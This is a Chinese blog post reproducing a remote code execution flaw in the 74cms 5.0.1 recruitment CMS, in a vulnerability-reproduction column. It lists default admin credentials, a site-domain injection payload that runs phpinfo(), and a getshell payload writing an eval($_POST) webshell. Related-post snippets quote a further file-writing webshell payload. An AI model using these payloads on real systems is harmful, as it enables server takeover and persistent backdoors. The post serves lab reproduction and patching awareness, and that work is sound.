骑士cms任意代码执行

最新推荐文章于 2024-01-02 10:23:38 发布
最新推荐文章于 2024-01-02 10:23:38 发布
阅读量397 收藏
点赞数
分类专栏: 漏洞复现 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46801402/article/details/127629750
版权

漏洞描述:

迅易科技 74cms是中国迅易科技公司的一套基于PHP和MySQL的在线招聘系统。

74cms version 5.0.1 存在安全漏洞,该漏洞源于应用管理控制器ConfigController.class.php和ThinkPHP Common functions.php存在远程代码执行漏洞,攻击者可利用该漏洞可以获得服务器权限并控制服务器。

漏洞利用条件:

/Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程代码执行

漏洞影响范围:

74cms version 5.0.1 

漏洞复现:

  1. /index.php?m=Admin 访问后台,adminadmin/adminadmin登录后台:

2.在网站域名中填写/.',phpinfo(),'/.com然后保存,刷新当前页面,返回phpinfo页面:

3.Getshell:在网站域名输入/.',eval($_POST[a]),'/.com,保存刷新:

4.连接木马:

 

修复建议:

1.关注厂商,升级版本

想要暴富的小林子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
骑士CMS远程代码执行.md
04-11
骑士CMS远程代码执行
vulfocus——骑士cms任意代码执行(CVE-2020-35339)
m0_62063669的博客
09-17 945
5.访问shell地址:/Application/Home/Conf/config.php骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。(不知道这里为什么没出现flag,然后在phpinfo找到flag)后台账号密码均为adminadmin。4.构造Payload验证漏洞存在。6.getshell (改包)3.在第三步进行抓包。2.找到后台登陆界面。
骑士cms任意代码执行(CVE-2020-35339)
m0_65150886的博客
01-02 506
在74CMS 5.0.1版本中的管理后台由于过滤不严谨,可以向配置文件写入恶意代码导致任意代码执行。5.此时再进行登录,登录成功后,只会显示更详细的phpinfo界面,没有其他内容,建议不要随便使用。3.进入后台后,点击:系统——网站配置——在网站域名中填写下面数据使页面返回phpinfo。4.然后保存,保存后刷新当前页面,phpinfo页面便映入眼帘。然后修改一下代码,便可以直接getshell。账号:adminadmin。1.访问ip:port。6.修改回原先配置信息。
修改了模板文件tpl如何立即生效_骑士CMSassign_resume_tpl远程代码执行漏洞
weixin_42511990的博客
01-14 330
漏洞描述骑士CMS是一套基于PHP+MYSQL的免费网站管理系统。骑士CMS官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士CMS某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。漏洞利用简单,且相关利用细节已公开。影响版本骑士CMS < 6.0.48安全版本骑士CMS 6.0.48安全建议1. 升级骑士CMS至最新版本。2....
骑士CMS 远程代码执行分析 - Panda1
08-03
【标题】: 骑士CMS远程代码执行漏洞分析 【描述】: 本文将深入探讨骑士CMS的一个安全问题,该问题源于Thinkphp框架的3.2.3版本。由于`assign_resume_tpl`全局函数的过滤不严,导致了模板注入漏洞,进而可能引发远程...
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
骑士cms最新开发手册.rar
06-29
CMS(Content Management System)是一种用于管理网站内容的软件平台,它允许非技术人员通过图形用户界面进行内容的添加、修改和删除,而无需直接编辑后端代码骑士CMS作为一款专注于人力资源管理的CMS,提供了专门...
骑士cms3.7商业版
01-22
绝对可用的骑士cms3.7商业版,修复多数漏洞,猎头系统支持微信公总号
不为空 命令_骑士 CMS 远程命令执行分析
weixin_39700063的博客
01-11 282
更多全球网络安全资讯尽在邑安全0x00 前言续师傅前些天跟我说骑士 CMS 更新了一个补丁,assign_resume_tpl这个全局函数出现了问题,让我分析看看,我看了下官网公告:http://www.74cms.com/news/show-2497.html/Application/Common/Controller/BaseController.class.php文件的as...
软件工程 人力资源管理系统 含系统 源码
01-12
软件工程 人力资源管理系统 含系统 源码 第1章 系统简介 4 1.1 系统概述 4 1.2 系统目标 4 1.3 适用范围 4 1.4 系统特点 4 第2章 软件安装 6 2.1 运行环境 6 2.2 数据库配置及安装 6 2.2.1 手动配置数据库 7 第3章 系统登录 10 第4章 系统管理 12 4.1 单位信息 12 4.2 管理员设置 13 4.3 更改密码 13 4.4 重新登录 14 4.5 数据备份 15 4.6 数据还原 15 4.7 退出系统 16 第5章 信息设置 17 5.1 部门信息 17 5.2 工种类型 18 5.3 职务类型 19 5.4 职称类型 20 5.5 文化程度 20 5.6 政治面貌 21 5.7 民族类型 22 5.8 所得税设置 23 5.9 考勤设置 24 第6章 人事管理 26 6.1 应聘登记 26 6.2 新员工登记 27 6.3 员工调动 28 6.4 员工离职 29 6.5 员工复职 29 6.6 考核管理 30 6.7 合同管理 32 6.8 应聘信息浏览 33 6.9 员工信息浏览 35 第7章 工资管理 39 7.1 工资档案设置 39 7.2 月工资结算 40 7.3 工资档案浏览 41 第8章 工具 44 第9章 帮助 45 9.1 关于 45
java猎头公司管理软件内部事务源代码含文档
03-25
需求分析是从客户的需求中提取出软件系统能够帮助用户解决的业务问题,而设计方案则是根据需求分析,规划出系统的功能模块,具体的划分如下: 1.公共模块 2.用户登录模块 3.系统主页模块 4.公司新闻模块 5.公司通知模块 6.用户对自己资料的操作模块 7.查询模块 8.各部门高层对本部门员工的操作模块 9.工资计算模块
AOD,NET 猎头管理系统
06-01
很不错的一个AOD.NET管理系统,值得大家参考参考 ,很不错的一个AOD.NET管理系统,值得大家参考参考
骑士cms(74CMS)高效人才招聘系统 v5.0.1 正式版.zip
07-16
骑士cms(74CMS)高效人才招聘系统 v5.0.1 正式版  更新日志  新增:后台增加跳转页面 新增:短信预警提醒,方便客户及时充值 新增:企业与个人账号通用 新增:未付费且登录的企业单独呈现,方便追踪客户 新增:后台统计增加列表页。方便追踪客户 新增:导出简历增加时间段、年龄段、性别等条件筛选 新增:简历增加项目经验 新增:PC端支持https 新增:对接企查查 新增:关注公众号领红包,快速吸粉 新增:专题招聘会触屏版 新增:事业单位招考触屏版 新增:企业专访触屏版 新增:内置节日主题 优化:表单填写 优化:提交操作增加等待提醒 优化:套餐改为点数,对简历进行分级收费 优化:小程序深度优化 优化:系统日志显示企业名称与个人名字,方便追踪客户 骑士PHP人才系统简介 骑士PHP人才系统(74cms)是一项基于PHP MYSQL为核心开发的一套免费 开源专业人才系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。凭借骑士网络的不断创新精神和认真的工作态度,相信骑士能够为您带来全新的使用体验! 骑士PHP人才系统功能特征: 多模式,更加灵活 用户可以自由选择积分模式和服务套餐模式,积分模式更灵活,套餐模式更直观。 模板机制,轻松改版 全新的模板引擎机制,界面完全与程序分离,管理员可轻松制作模板和在后台切换模板。 在线支付,无人值守 集成网上支付,自动收款并开通相关服务,自动充值,自动开通。 搜索优化,完美植入 灵活自定义URL,自定义目录结构,自定义关键字,有效提高搜索引擎排名。 集成火车头,自动采集 定时定点采集各大招聘网站的信息,实时自动发布信息。 使用简单,功能强大 软件使用简单灵活,功能强大,更多优秀模块陆续开发中。 骑士PHP人才系统前台页面: 骑士PHP人才系统后管理 后台路径:/admin/admin_index.php 用户名与密码:admin(安装时可以设置) 后台页面: 相关阅读 同类推荐:人才招聘系统
骑士PHP人才系统(74CMS)源代码 v3.0
11-09
 骑士CMS-PHP人才系统源码,功能模块专业,系统以招聘求职模块与诸多实用辅助模块组成,专业、强大、实用、易用。在布局上科学严谨,给用户赏心悦目的视觉感受,而且程序开源免费、安全稳定,拥有WEB2.0新技术使系统拥有一流的用户体验。
骑士CMS文件包含+getshell漏洞复现(python自动化验证扫描漏洞)
走在搬砖的路上!
08-02 3299
简介 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 +开源专业人才网站系统 公告地址: http://www.74cms.com/news/show-2497.html /Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行 影响版本 骑士 CMS < 6.0.48 环境搭建 这里使用phpstudy进.
【漏洞复现-骑士cms-代码执行】vulfocus/骑士cms_cve_2020_35339
10-13 1690
骑士cms-代码执行】植入到可执行的文件中
骑士CMS模版注入+文件包含getshell漏洞复现
锋刃科技的博客
12-22 3145
简介 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统 漏洞概述 公告地址: http://www.74cms.com/news/show-2497.html /Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行。 影响版本 骑士 CMS < 6.0.48 环境搭建 ...
74cms v5.0.1存在远程连接命令/代码执行漏洞
qq_58091216的博客
05-14 713
由于小编最近在面试找工作,所以没有时间进行更新文章,先浅更一个任意代码执行漏洞。 1.打开127.0.0.1/74cms/upload/install.php进行安装 2.使用管理员账号登陆后台,点击保存网络配置并使用burpsuite抓包。 3.之后修改site_domain(<?php phpinfo();?> base64之PD9waHAgcGhwaW5mbygpOz8+),site_domain=',file_put_contents('403.php',base6
CMS中数据绑定代码
最新发布
06-01
CMS中,数据绑定是将数据源与数据目标进行关联,从而实现数据在...以上是一些常见的CMS中数据绑定的代码示例。在实际开发中,可以根据具体需求进行相应的调整和优化。如果您有任何问题或需要进一步了解,请随时提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值